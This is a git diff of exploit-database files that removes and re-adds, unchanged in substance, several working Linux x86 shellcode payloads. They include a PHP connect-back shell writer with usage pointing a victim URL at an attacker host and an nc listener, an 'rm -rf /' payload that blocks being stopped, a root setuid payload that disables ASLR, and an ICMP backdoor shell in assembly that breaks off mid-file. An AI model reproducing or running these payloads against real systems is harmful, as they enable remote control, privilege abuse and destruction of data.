"\x89\xe1" +; "\xcd\x80" +; "\x5b" +; "\x89\xc2" +; "\x31\xdb" +; "\x53" +; "\x66\xbb\x82\x06" +; "\x66\x81\xeb\x62\x06" +; "\x66\x53" +; "\xb0\x02" +; "\x66\x50" +; "\x89\xe1" +; "\xb0\x10" +; "\x50" +; "\x51" +; "\x52" +; "\xb0\x66" +; "\x66\xbb\x82\x06" +; "\x66\x81\xeb\x7f\x06" +; "\x89\xe1" +; "\xcd\x80" +; "\x89\xc3" +; "\x5b" +; "\x66\xb8\x82\x06" +; "\x66\x2d\x7e\x06" +; "\x56" +; "\x66\xba\x1a\x41" +; "\x66\x81\xea\x54\x3c" +; "\xcd\x80" +; "\x31\xc0" +; "\x40" +; "\x89\xc3" +; "\xcd\x80"; +; int main(int argc, char **argv) +; { +; int *ret; +; ret = (int *)&ret + 2; +; (*ret) = (int) shellcode; +; } + ; milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13340.c b/platforms/lin_x86/shellcode/13340.c index 265a9b014..f8e7ec788 100755 --- a/platforms/lin_x86/shellcode/13340.c +++ b/platforms/lin_x86/shellcode/13340.c @@ -1,126 +1,126 @@ -#include - - /* Grayscale Research: Linux Write FS PHP Connect Back Utility Shellcode - * - * Function: - * Opens /var/www/cb.php and writes a php connectback shell to the filesystem. - * - * Shellcode Size: 508 bytes (No Encodings) - * - * PHP Shell Usage: - * // victim - * http://vulnhost.com/cb.php?host=192.168.1.1?port=777 - * - * // attacker - * nc -l -p 777 - * - * greets: #c-, #hhp, #oldskewl, d-town, sd2600, dc214, everyone else. - * - * - * ~roonr - */ - - - // shellcode - char sc[] = "\x68\x70\x68\x70\xff\x68\x2f\x63\x62\x2e\x68\x2f\x77\x77\x77\x68" - "\x2f\x76\x61\x72\x31\xc0\x89\xe6\x88\x46\x0f\x89\xe3\x31\xc9\xb1" - "\x42\x31\xd2\xb2\xff\x31\xc0\xb0\x05\xcd\x80\x31\xdb\x88\xc3\x68" - "\x3f\x3e\xff\xff\x68\x3b\x7d\x20\x7d\x68\x24\x72\x29\x29\x68\x6c" - "\x65\x6e\x28\x68\x20\x73\x74\x72\x68\x20\x24\x72\x2c\x68\x6f\x63" - "\x6b\x2c\x68\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74" - "\x5f\x68\x3b\x73\x6f\x63\x68\x31\x24\x20\x22\x68\x73\x75\x31\x2e" - "\x68\x5c\x6e\x63\x62\x68\x2e\x3d\x20\x22\x68\x60\x3b\x24\x72\x68" - "\x20\x60\x24\x69\x68\x24\x72\x20\x3d\x68\x30\x29\x29\x7b\x68\x2c" - "\x20\x31\x30\x68\x73\x6f\x63\x6b\x68\x61\x64\x28\x24\x68\x74\x5f" - "\x72\x65\x68\x6f\x63\x6b\x65\x68\x24\x69\x3d\x73\x68\x69\x6c\x65" - "\x28\x68\x29\x3b\x77\x68\x68\x22\x2c\x31\x30\x68\x74\x65\x64\x3a" - "\x68\x6e\x6e\x65\x63\x68\x20\x22\x43\x6f\x68\x6f\x63\x6b\x2c\x68" - "\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74\x5f\x68\x3b" - "\x73\x6f\x63\x68\x6f\x72\x74\x29\x68\x2c\x20\x24\x70\x68\x72\x65" - "\x73\x73\x68\x24\x61\x64\x64\x68\x63\x6b\x2c\x20\x68\x28\x24\x73" - "\x6f\x68\x6e\x65\x63\x74\x68\x5f\x63\x6f\x6e\x68\x63\x6b\x65\x74" - "\x68\x29\x3b\x73\x6f\x68\x5f\x54\x43\x50\x68\x2c\x53\x4f\x4c\x68" - "\x52\x45\x41\x4d\x68\x4b\x5f\x53\x54\x68\x2c\x53\x4f\x43\x68\x49" - "\x4e\x45\x54\x68\x28\x41\x46\x5f\x68\x65\x61\x74\x65\x68\x74\x5f" - "\x63\x72\x68\x6f\x63\x6b\x65\x68\x63\x6b\x3d\x73\x68\x3b\x24\x73" - "\x6f\x68\x72\x74\x27\x5d\x68\x5b\x27\x70\x6f\x68\x5f\x47\x45\x54" - "\x68\x72\x74\x3d\x24\x68\x3b\x24\x70\x6f\x68\x74\x27\x5d\x29\x68" - "\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x65\x28\x24\x5f\x68\x79" - "\x6e\x61\x6d\x68\x6f\x73\x74\x62\x68\x67\x65\x74\x68\x68\x65\x73" - "\x73\x3d\x68\x61\x64\x64\x72\x68\x73\x65\x7b\x24\x68\x3b\x7d\x65" - "\x6c\x68\x34\x2e\x22\x29\x68\x72\x20\x34\x30\x68\x45\x72\x72\x6f" - "\x68\x6e\x74\x28\x22\x68\x7b\x70\x72\x69\x68\x74\x27\x5d\x29\x68" - "\x27\x70\x6f\x72\x68\x47\x45\x54\x5b\x68\x26\x21\x24\x5f\x68\x74" - "\x27\x5d\x26\x68\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x28\x21" - "\x24\x5f\x68\x50\x20\x69\x66\x68\x3c\x3f\x50\x48\x31\xc0\x89\xe6" - "\xb0\x04\x89\xe1\x66\xba\x62\x01\xcd\x80"; - - -int main(){ - - - // run shellcode - asm("JMP %0;" : "=m" (sc)); - - /* - asm volatile( - "cb_shellcode:\n" - "push $0xff706870;" - "push $0x2e62632f;" - "push $0x7777772f;" - "push $0x7261762f;" - "xor %eax, %eax;" - "mov %esp, %esi;" - "movb %al, 0xf(%esi);" - - // sys_open - "mov %esp, %ebx; " - "xor %ecx, %ecx;" - "movb $0x42, %cl;" - "xor %edx, %edx;" - "movb $0xff, %dl;" - "xor %eax, %eax;" - "movb $0x05, %al;" - "int $0x80;" - - // sys_write - "xor %ebx, %ebx;" - "mov %al, %bl;" - - // php connectback shellcode - "push $0xffff3e3f; push $0x7d207d3b; push $0x29297224; push $0x286e656c;" - "push $0x72747320; push $0x2c722420; push $0x2c6b636f; push $0x73242865;" - "push $0x74697277; push $0x5f74656b; push $0x636f733b; push $0x22202431;" - "push $0x2e317573; push $0x62636e5c; push $0x22203d2e; push $0x72243b60;" - "push $0x69246020; push $0x3d207224; push $0x7b292930; push $0x3031202c;" - "push $0x6b636f73; push $0x24286461; push $0x65725f74; push $0x656b636f;" - "push $0x733d6924; push $0x28656c69; push $0x68773b29; push $0x30312c22;" - "push $0x3a646574; push $0x63656e6e; push $0x6f432220; push $0x2c6b636f;" - "push $0x73242865; push $0x74697277; push $0x5f74656b; push $0x636f733b;" - "push $0x2974726f; push $0x7024202c; push $0x73736572; push $0x64646124;" - "push $0x202c6b63; push $0x6f732428; push $0x7463656e; push $0x6e6f635f;" - "push $0x74656b63; push $0x6f733b29; push $0x5043545f; push $0x4c4f532c;" - "push $0x4d414552; push $0x54535f4b; push $0x434f532c; push $0x54454e49;" - "push $0x5f464128; push $0x65746165; push $0x72635f74; push $0x656b636f;" - "push $0x733d6b63; push $0x6f73243b; push $0x5d277472; push $0x6f70275b;" - "push $0x5445475f; push $0x243d7472; push $0x6f70243b; push $0x295d2774;" - "push $0x736f6827; push $0x5b544547; push $0x5f242865; push $0x6d616e79;" - "push $0x6274736f; push $0x68746567; push $0x3d737365; push $0x72646461;" - "push $0x247b6573; push $0x6c657d3b; push $0x29222e34; push $0x30342072;" - "push $0x6f727245; push $0x2228746e; push $0x6972707b; push $0x295d2774;" - "push $0x726f7027; push $0x5b544547; push $0x5f242126; push $0x265d2774;" - "push $0x736f6827; push $0x5b544547; push $0x5f242128; push $0x66692050;" - "push $0x48503f3c;" - - "xor %eax, %eax;" - "mov %esp, %esi;" - "movb $0x04, %al;" - "mov %esp, %ecx;" - "mov $0x162, %dx;" - "int $0x80;"); - - */ - -} - +#include + + /* Grayscale Research: Linux Write FS PHP Connect Back Utility Shellcode + * + * Function: + * Opens /var/www/cb.php and writes a php connectback shell to the filesystem. + * + * Shellcode Size: 508 bytes (No Encodings) + * + * PHP Shell Usage: + * // victim + * http://vulnhost.com/cb.php?host=192.168.1.1?port=777 + * + * // attacker + * nc -l -p 777 + * + * greets: #c-, #hhp, #oldskewl, d-town, sd2600, dc214, everyone else. + * + * + * ~roonr + */ + + + // shellcode + char sc[] = "\x68\x70\x68\x70\xff\x68\x2f\x63\x62\x2e\x68\x2f\x77\x77\x77\x68" + "\x2f\x76\x61\x72\x31\xc0\x89\xe6\x88\x46\x0f\x89\xe3\x31\xc9\xb1" + "\x42\x31\xd2\xb2\xff\x31\xc0\xb0\x05\xcd\x80\x31\xdb\x88\xc3\x68" + "\x3f\x3e\xff\xff\x68\x3b\x7d\x20\x7d\x68\x24\x72\x29\x29\x68\x6c" + "\x65\x6e\x28\x68\x20\x73\x74\x72\x68\x20\x24\x72\x2c\x68\x6f\x63" + "\x6b\x2c\x68\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74" + "\x5f\x68\x3b\x73\x6f\x63\x68\x31\x24\x20\x22\x68\x73\x75\x31\x2e" + "\x68\x5c\x6e\x63\x62\x68\x2e\x3d\x20\x22\x68\x60\x3b\x24\x72\x68" + "\x20\x60\x24\x69\x68\x24\x72\x20\x3d\x68\x30\x29\x29\x7b\x68\x2c" + "\x20\x31\x30\x68\x73\x6f\x63\x6b\x68\x61\x64\x28\x24\x68\x74\x5f" + "\x72\x65\x68\x6f\x63\x6b\x65\x68\x24\x69\x3d\x73\x68\x69\x6c\x65" + "\x28\x68\x29\x3b\x77\x68\x68\x22\x2c\x31\x30\x68\x74\x65\x64\x3a" + "\x68\x6e\x6e\x65\x63\x68\x20\x22\x43\x6f\x68\x6f\x63\x6b\x2c\x68" + "\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74\x5f\x68\x3b" + "\x73\x6f\x63\x68\x6f\x72\x74\x29\x68\x2c\x20\x24\x70\x68\x72\x65" + "\x73\x73\x68\x24\x61\x64\x64\x68\x63\x6b\x2c\x20\x68\x28\x24\x73" + "\x6f\x68\x6e\x65\x63\x74\x68\x5f\x63\x6f\x6e\x68\x63\x6b\x65\x74" + "\x68\x29\x3b\x73\x6f\x68\x5f\x54\x43\x50\x68\x2c\x53\x4f\x4c\x68" + "\x52\x45\x41\x4d\x68\x4b\x5f\x53\x54\x68\x2c\x53\x4f\x43\x68\x49" + "\x4e\x45\x54\x68\x28\x41\x46\x5f\x68\x65\x61\x74\x65\x68\x74\x5f" + "\x63\x72\x68\x6f\x63\x6b\x65\x68\x63\x6b\x3d\x73\x68\x3b\x24\x73" + "\x6f\x68\x72\x74\x27\x5d\x68\x5b\x27\x70\x6f\x68\x5f\x47\x45\x54" + "\x68\x72\x74\x3d\x24\x68\x3b\x24\x70\x6f\x68\x74\x27\x5d\x29\x68" + "\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x65\x28\x24\x5f\x68\x79" + "\x6e\x61\x6d\x68\x6f\x73\x74\x62\x68\x67\x65\x74\x68\x68\x65\x73" + "\x73\x3d\x68\x61\x64\x64\x72\x68\x73\x65\x7b\x24\x68\x3b\x7d\x65" + "\x6c\x68\x34\x2e\x22\x29\x68\x72\x20\x34\x30\x68\x45\x72\x72\x6f" + "\x68\x6e\x74\x28\x22\x68\x7b\x70\x72\x69\x68\x74\x27\x5d\x29\x68" + "\x27\x70\x6f\x72\x68\x47\x45\x54\x5b\x68\x26\x21\x24\x5f\x68\x74" + "\x27\x5d\x26\x68\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x28\x21" + "\x24\x5f\x68\x50\x20\x69\x66\x68\x3c\x3f\x50\x48\x31\xc0\x89\xe6" + "\xb0\x04\x89\xe1\x66\xba\x62\x01\xcd\x80"; + + +int main(){ + + + // run shellcode + asm("JMP %0;" : "=m" (sc)); + + /* + asm volatile( + "cb_shellcode:\n" + "push $0xff706870;" + "push $0x2e62632f;" + "push $0x7777772f;" + "push $0x7261762f;" + "xor %eax, %eax;" + "mov %esp, %esi;" + "movb %al, 0xf(%esi);" + + // sys_open + "mov %esp, %ebx; " + "xor %ecx, %ecx;" + "movb $0x42, %cl;" + "xor %edx, %edx;" + "movb $0xff, %dl;" + "xor %eax, %eax;" + "movb $0x05, %al;" + "int $0x80;" + + // sys_write + "xor %ebx, %ebx;" + "mov %al, %bl;" + + // php connectback shellcode + "push $0xffff3e3f; push $0x7d207d3b; push $0x29297224; push $0x286e656c;" + "push $0x72747320; push $0x2c722420; push $0x2c6b636f; push $0x73242865;" + "push $0x74697277; push $0x5f74656b; push $0x636f733b; push $0x22202431;" + "push $0x2e317573; push $0x62636e5c; push $0x22203d2e; push $0x72243b60;" + "push $0x69246020; push $0x3d207224; push $0x7b292930; push $0x3031202c;" + "push $0x6b636f73; push $0x24286461; push $0x65725f74; push $0x656b636f;" + "push $0x733d6924; push $0x28656c69; push $0x68773b29; push $0x30312c22;" + "push $0x3a646574; push $0x63656e6e; push $0x6f432220; push $0x2c6b636f;" + "push $0x73242865; push $0x74697277; push $0x5f74656b; push $0x636f733b;" + "push $0x2974726f; push $0x7024202c; push $0x73736572; push $0x64646124;" + "push $0x202c6b63; push $0x6f732428; push $0x7463656e; push $0x6e6f635f;" + "push $0x74656b63; push $0x6f733b29; push $0x5043545f; push $0x4c4f532c;" + "push $0x4d414552; push $0x54535f4b; push $0x434f532c; push $0x54454e49;" + "push $0x5f464128; push $0x65746165; push $0x72635f74; push $0x656b636f;" + "push $0x733d6b63; push $0x6f73243b; push $0x5d277472; push $0x6f70275b;" + "push $0x5445475f; push $0x243d7472; push $0x6f70243b; push $0x295d2774;" + "push $0x736f6827; push $0x5b544547; push $0x5f242865; push $0x6d616e79;" + "push $0x6274736f; push $0x68746567; push $0x3d737365; push $0x72646461;" + "push $0x247b6573; push $0x6c657d3b; push $0x29222e34; push $0x30342072;" + "push $0x6f727245; push $0x2228746e; push $0x6972707b; push $0x295d2774;" + "push $0x726f7027; push $0x5b544547; push $0x5f242126; push $0x265d2774;" + "push $0x736f6827; push $0x5b544547; push $0x5f242128; push $0x66692050;" + "push $0x48503f3c;" + + "xor %eax, %eax;" + "mov %esp, %esi;" + "movb $0x04, %al;" + "mov %esp, %ecx;" + "mov $0x162, %dx;" + "int $0x80;"); + + */ + +} + // milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13341.c b/platforms/lin_x86/shellcode/13341.c index f7d468d8d..a6af37c3b 100755 --- a/platforms/lin_x86/shellcode/13341.c +++ b/platforms/lin_x86/shellcode/13341.c @@ -1,74 +1,74 @@ -/* -x86 linux rm -rf / which attempts to block the process from being stopped -132 bytes -written by onionring -*/ - -main() -{ - char shellcode[] = -"\x31\xC0" // xor eax, eax -"\x89\xC3" // mov ebx, eax -"\x89\xC1" // mov ecx, eax -"\x41" // inc ecx -"\xB0\x30" // mov al, 0x30 ; sys_signal -"\xCD\x80" // int 0x80 -"\x31\xC0" // xor eax, eax -"\xFE\xC3" // inc bl -"\x80\xFB\x1F" // cmp bl, 0x1f -"\x72\xF3" // jb 0xf3 -"\x04\x40" // add al, 0x40 ; sys_getppid -"\xCD\x80" // int 0x80 -"\x89\xC2" // mov edx, eax -"\x31\xC0" // xor eax, eax -"\xB0\x02" // mov al, 0x2 ; sys_fork -"\xCD\x80" // int 0x80 -"\x39\xC0" // cmp eax, eax -"\x74\x08" // jnz 0x8 -"\x31\xC0" // xor eax, eax -"\x89\xC3" // mov ebx, eax -"\xB0\x01" // mov al, 0x1 ; sys_exit -"\xCD\x80" // int 0x80 -"\x31\xC0" // xor eax, eax -"\xB0\x42" // mov al, 0x42 ; sys_setsid -"\xCD\x80" // int 0x80 -"\x43" // inc ebx -"\x39\xDA" // cmp edx, ebx -"\x74\x08" // jz 0x8 -"\x89\xD3" // mov ebx, edx -"\x31\xC0" // xor eax, eax -"\x04\x25" // add al, 0x25 ; sys_kill -"\xCD\x80" // int 0x80 -"\x31\xC0" // xor eax, eax -"\x50" // push eax -"\x68\x6F\x67\x69\x6E" // push "ogin" -"\x68\x69\x6E\x2F\x6C" // push "in/l" -"\x68\x2F\x2F\x2F\x62" // push "///b" -"\x89\xE3" // mov ebx, esp -"\x31\xC0" // xor eax, eax -"\x04\x0A" // add al, 0xa ; sys_unlink -"\xCD\x80" // int 0x80 -"\x31\xC0" // xor eax, eax -"\x50" // push eax -"\x68\x2F\x2F\x2F\x2F" // push "////" -"\x89\xE2" // mov edx, esp -"\x50" // push eax -"\x68\x2D\x72\x66\x66" // push "-rff" -"\x89\xE1" // mov ecx, esp -"\x50" // push eax -"\x68\x6E\x2F\x72\x6D" // push "n/rm" -"\x68\x2F\x2F\x62\x69" // push "//bi" -"\x89\xE3" // mov ebx, esp -"\x50" // push eax -"\x52" // push edx -"\x51" // push ecx -"\x53" // push ebx -"\x89\xE1" // mov ecx, esp -"\x31\xD2" // xor edx, edx -"\x04\x0B" // add al, 0xb ; sys_execve -"\xCD\x80"; // int 0x80 - - (*(void (*)()) shellcode)(); -} - +/* +x86 linux rm -rf / which attempts to block the process from being stopped +132 bytes +written by onionring +*/ + +main() +{ + char shellcode[] = +"\x31\xC0" // xor eax, eax +"\x89\xC3" // mov ebx, eax +"\x89\xC1" // mov ecx, eax +"\x41" // inc ecx +"\xB0\x30" // mov al, 0x30 ; sys_signal +"\xCD\x80" // int 0x80 +"\x31\xC0" // xor eax, eax +"\xFE\xC3" // inc bl +"\x80\xFB\x1F" // cmp bl, 0x1f +"\x72\xF3" // jb 0xf3 +"\x04\x40" // add al, 0x40 ; sys_getppid +"\xCD\x80" // int 0x80 +"\x89\xC2" // mov edx, eax +"\x31\xC0" // xor eax, eax +"\xB0\x02" // mov al, 0x2 ; sys_fork +"\xCD\x80" // int 0x80 +"\x39\xC0" // cmp eax, eax +"\x74\x08" // jnz 0x8 +"\x31\xC0" // xor eax, eax +"\x89\xC3" // mov ebx, eax +"\xB0\x01" // mov al, 0x1 ; sys_exit +"\xCD\x80" // int 0x80 +"\x31\xC0" // xor eax, eax +"\xB0\x42" // mov al, 0x42 ; sys_setsid +"\xCD\x80" // int 0x80 +"\x43" // inc ebx +"\x39\xDA" // cmp edx, ebx +"\x74\x08" // jz 0x8 +"\x89\xD3" // mov ebx, edx +"\x31\xC0" // xor eax, eax +"\x04\x25" // add al, 0x25 ; sys_kill +"\xCD\x80" // int 0x80 +"\x31\xC0" // xor eax, eax +"\x50" // push eax +"\x68\x6F\x67\x69\x6E" // push "ogin" +"\x68\x69\x6E\x2F\x6C" // push "in/l" +"\x68\x2F\x2F\x2F\x62" // push "///b" +"\x89\xE3" // mov ebx, esp +"\x31\xC0" // xor eax, eax +"\x04\x0A" // add al, 0xa ; sys_unlink +"\xCD\x80" // int 0x80 +"\x31\xC0" // xor eax, eax +"\x50" // push eax +"\x68\x2F\x2F\x2F\x2F" // push "////" +"\x89\xE2" // mov edx, esp +"\x50" // push eax +"\x68\x2D\x72\x66\x66" // push "-rff" +"\x89\xE1" // mov ecx, esp +"\x50" // push eax +"\x68\x6E\x2F\x72\x6D" // push "n/rm" +"\x68\x2F\x2F\x62\x69" // push "//bi" +"\x89\xE3" // mov ebx, esp +"\x50" // push eax +"\x52" // push edx +"\x51" // push ecx +"\x53" // push ebx +"\x89\xE1" // mov ecx, esp +"\x31\xD2" // xor edx, edx +"\x04\x0B" // add al, 0xb ; sys_execve +"\xCD\x80"; // int 0x80 + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13342.c b/platforms/lin_x86/shellcode/13342.c index 17e2712c6..7ab4e2a01 100755 --- a/platforms/lin_x86/shellcode/13342.c +++ b/platforms/lin_x86/shellcode/13342.c @@ -1,55 +1,55 @@ -/* - * Linux/x86 (Fedora 8) setuid(0) + setgid(0) + execve("echo 0 > /proc/sys/kernel/randomize_va_space") - * - * by LiquidWorm - * - * 2008 (c) www.zeroscience.org - * - * liquidworm [at] gmail.com - * - * 79 bytes. - * - */ - - -char sc[] = - - "\x6a\x17" // push $0x17 - "\x58" // pop %eax - "\x31\xdb" // xor %ebx, %ebx - "\xcd\x80" // int $0x80 - "\x6a\x2e" // push $0x2e - "\x58" // pop %eax - "\x53" // push %ebx - "\xcd\x80" // int $0x80 - "\x31\xd2" // xor %edx, %edx - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x70\x61\x63\x65" // push $0x65636170 - "\x76\x61\x5f\x73" // push $0x735f6176 - "\x69\x7a\x65\x5f" // push $0x5f657a69 - "\x6e\x64\x6f\x6d" // push $0x6d6f646e - "\x6c\x2f\x72\x61" // push $0x61722f6c - "\x65\x72\x6e\x65" // push $0x656e7265 - "\x73\x2f\x2f\x6b" // push $0x6b2f2f73 - "\x2f\x2f\x73\x79" // push $0x79732f2f - "\x70\x72\x6f\x63" // push $0x636f7270 - "\x20\x3e\x20\x2f" // push $0x2f203e20 - "\x68\x6f\x20\x30" // push $0x30206f68 - "\x2f\x2f\x65\x63" // push $0x63652f2f - "\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() -{ - int (*fp)() = (int(*)())sc; - printf("bytes: %u\n", strlen(sc)); - fp(); -} - +/* + * Linux/x86 (Fedora 8) setuid(0) + setgid(0) + execve("echo 0 > /proc/sys/kernel/randomize_va_space") + * + * by LiquidWorm + * + * 2008 (c) www.zeroscience.org + * + * liquidworm [at] gmail.com + * + * 79 bytes. + * + */ + + +char sc[] = + + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx, %ebx + "\xcd\x80" // int $0x80 + "\x6a\x2e" // push $0x2e + "\x58" // pop %eax + "\x53" // push %ebx + "\xcd\x80" // int $0x80 + "\x31\xd2" // xor %edx, %edx + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x70\x61\x63\x65" // push $0x65636170 + "\x76\x61\x5f\x73" // push $0x735f6176 + "\x69\x7a\x65\x5f" // push $0x5f657a69 + "\x6e\x64\x6f\x6d" // push $0x6d6f646e + "\x6c\x2f\x72\x61" // push $0x61722f6c + "\x65\x72\x6e\x65" // push $0x656e7265 + "\x73\x2f\x2f\x6b" // push $0x6b2f2f73 + "\x2f\x2f\x73\x79" // push $0x79732f2f + "\x70\x72\x6f\x63" // push $0x636f7270 + "\x20\x3e\x20\x2f" // push $0x2f203e20 + "\x68\x6f\x20\x30" // push $0x30206f68 + "\x2f\x2f\x65\x63" // push $0x63652f2f + "\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() +{ + int (*fp)() = (int(*)())sc; + printf("bytes: %u\n", strlen(sc)); + fp(); +} + // milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13343.asm b/platforms/lin_x86/shellcode/13343.asm index 7e53c4a3b..851ec818a 100755 --- a/platforms/lin_x86/shellcode/13343.asm +++ b/platforms/lin_x86/shellcode/13343.asm @@ -1,199 +1,199 @@ -; -; Copyright (c) 2007 by -; -; 235-byte raw-socket ICMP/checksum shell - (x86-lnx) -; by mu-b - Nov 2006 -; -; icmp with identifier __flag_byte and commands in the -; following format:- -; "/bin/sh\x00-c\x00\x00" -; -; unlike *other* icmp shells, this will reply with -; 255-(sizeof icmp_hdr) bytes of output.. -; - -%define zero_reg esi -%define zero_reg_w si -%define sock_reg edi -%define __flag_byte 6996h - -global _shell - -_shell: - xor zero_reg, zero_reg - mov ebp, esp - - ; sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); -_socket: - lea ebx, [zero_reg+3] - push byte 1 - push ebx - dec ebx - push ebx - dec ebx - mov ecx, esp - lea eax, [zero_reg+66h] - int 80h ; socket(); - mov sock_reg, eax - - ; setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &1, 1); -_setsockopt: - push ebx - push esp - push byte 3h - push zero_reg - push sock_reg - mov ecx, esp - mov bl, byte 0eh - mov al, byte 66h - int 80h ; setsocketopt(); - - ; while(1) -_while_loop: - ; read(sockfd, cmd, 255); - cdq - dec byte dl - mov ecx, ebp - mov ebx, sock_reg - lea eax, [zero_reg+3] - int 80h ; read(); - - lea ebx, [ebp+24] - xor [ebx], word __flag_byte - jne short _while_loop - - ; pipe(pp) - lea ebx, [ebp-8] - mov al, byte 2ah - int 80h ; pipe(); - - ; fork() - mov al, byte 2h - int 80h ; fork(); - test eax, eax - jnz short _parent - -_child: - ; close(pp[0]) - mov ebx, [ebp-8] - mov al, byte 6h - int 80h ; close(); - - ; dup2(pp[1], 0); dup2(pp[1], 1); dup2(pp[1], 2); - lea ecx, [zero_reg+3] - ; pp[1] == pp[0]+1 - inc ebx - -.1: - dec ecx - mov al, byte 3fh - int 80h ; dup2(); - jnz .1 - - ; execve(cmd + 28, {cmd + 28, cmd + 36, cmd + 39, 0}, 0); - push zero_reg - lea ebx, [ebp+39] - push ebx - sub ebx, byte 3 - push ebx - sub ebx, byte 8 - push ebx - mov ecx, esp - cdq - mov al, byte 0bh - int 80h ; execve(); - -_parent: - ; close(pp[1]) - mov ebx, [ebp-4] - lea eax, [zero_reg+6] - int 80h ; close(); - -_parent_read: -.1: - ; read(pp[0], cmd, bytes_left); - ; edx == 255 - lea ecx, [ebp+28] - mov ebx, [ebp-8] - mov al, byte 3h - int 80h ; read(); - test eax, eax - jl _while_loop - - mov al, byte 6h - int 80h ; close(); - -.2: - ; fix up ttl (optional?! make sure its high!) - ; mov [ebp+8], byte 0ffh - - ; switch ip's - mov ecx, [ebp+12] - xchg [ebp+16], ecx - mov [ebp+12], ecx - - ; set icmp type to echo reply (optional?!) - ;mov [ebp+20], word zero_reg_w - ; zero checksum - ;mov [ebp+22], word zero_reg_w - ; set icmp type to echo and zero checksum - mov [ebp+20], zero_reg - - lea ecx, [zero_reg+117] - lea esi, [ebp+20] - cdq - -.3: - lodsw - add edx, eax - loop .3 - - lodsb - xor ah, ah - add eax, edx - mov esi, eax - - shr eax, byte 16 - movzx esi, si - add eax, esi - mov edx, eax - shr edx, byte 16 - add eax, edx - not ax - - ; set checksum - mov [ebp+22], word ax - - cdq - xor eax, eax - xor zero_reg, zero_reg - - ; struct sockaddr * - push zero_reg - push zero_reg - push dword [ebp+16] - push byte 2 - - ; sendto(sockfd, cmd, 255, 0, ...); - mov ecx, esp - push byte 16 - push ecx - push zero_reg - mov dl, byte 0ffh - push edx - push ebp - push sock_reg - mov ecx, esp - mov bl, 0bh - mov al, 66h - int 80h ; sendto(); - - cdq - mov ecx, ebp - mov ebx, zero_reg - mov al, 72h - int 80h ; wait(); - - jmp _while_loop - +; +; Copyright (c) 2007 by +; +; 235-byte raw-socket ICMP/checksum shell - (x86-lnx) +; by mu-b - Nov 2006 +; +; icmp with identifier __flag_byte and commands in the +; following format:- +; "/bin/sh\x00-c\x00\x00" +; +; unlike *other* icmp shells, this will reply with +; 255-(sizeof icmp_hdr) bytes of output.. +; + +%define zero_reg esi +%define zero_reg_w si +%define sock_reg edi +%define __flag_byte 6996h + +global _shell + +_shell: + xor zero_reg, zero_reg + mov ebp, esp + + ; sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); +_socket: + lea ebx, [zero_reg+3] + push byte 1 + push ebx + dec ebx + push ebx + dec ebx + mov ecx, esp + lea eax, [zero_reg+66h] + int 80h ; socket(); + mov sock_reg, eax + + ; setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &1, 1); +_setsockopt: + push ebx + push esp + push byte 3h + push zero_reg + push sock_reg + mov ecx, esp + mov bl, byte 0eh + mov al, byte 66h + int 80h ; setsocketopt(); + + ; while(1) +_while_loop: + ; read(sockfd, cmd, 255); + cdq + dec byte dl + mov ecx, ebp + mov ebx, sock_reg + lea eax, [zero_reg+3] + int 80h ; read(); + + lea ebx, [ebp+24] + xor [ebx], word __flag_byte + jne short _while_loop + + ; pipe(pp) + lea ebx, [ebp-8] + mov al, byte 2ah + int 80h ; pipe(); + + ; fork() + mov al, byte 2h + int 80h ; fork(); + test eax, eax + jnz short _parent + +_child: + ; close(pp[0]) + mov ebx, [ebp-8] + mov al, byte 6h + int 80h ; close(); + + ; dup2(pp[1], 0); dup2(pp[1], 1); dup2(pp[1], 2); + lea ecx, [zero_reg+3] + ; pp[1] == pp[0]+1 + inc ebx + +.1: + dec ecx + mov al, byte 3fh + int 80h ; dup2(); + jnz .1 + + ; execve(cmd + 28, {cmd + 28, cmd + 36, cmd + 39, 0}, 0); + push zero_reg + lea ebx, [ebp+39] + push ebx + sub ebx, byte 3 + push ebx + sub ebx, byte 8 + push ebx + mov ecx, esp + cdq + mov al, byte 0bh + int 80h ; execve(); + +_parent: + ; close(pp[1]) + mov ebx, [ebp-4] + lea eax, [zero_reg+6] + int 80h ; close(); + +_parent_read: +.1: + ; read(pp[0], cmd, bytes_left); + ; edx == 255 + lea ecx, [ebp+28] + mov ebx, [ebp-8] + mov al, byte 3h + int 80h ; read(); + test eax, eax + jl _while_loop + + mov al, byte 6h + int 80h ; close(); + +.2: + ; fix up ttl (optional?! make sure its high!) + ; mov [ebp+8], byte 0ffh + + ; switch ip's + mov ecx, [ebp+12] + xchg [ebp+16], ecx + mov [ebp+12], ecx + + ; set icmp type to echo reply (optional?!) + ;mov [ebp+20], word zero_reg_w + ; zero checksum + ;mov [ebp+22], word zero_reg_w + ; set icmp type to echo and zero checksum + mov [ebp+20], zero_reg + + lea ecx, [zero_reg+117] + lea esi, [ebp+20] + cdq + +.3: + lodsw + add edx, eax + loop .3 + + lodsb + xor ah, ah + add eax, edx + mov esi, eax + + shr eax, 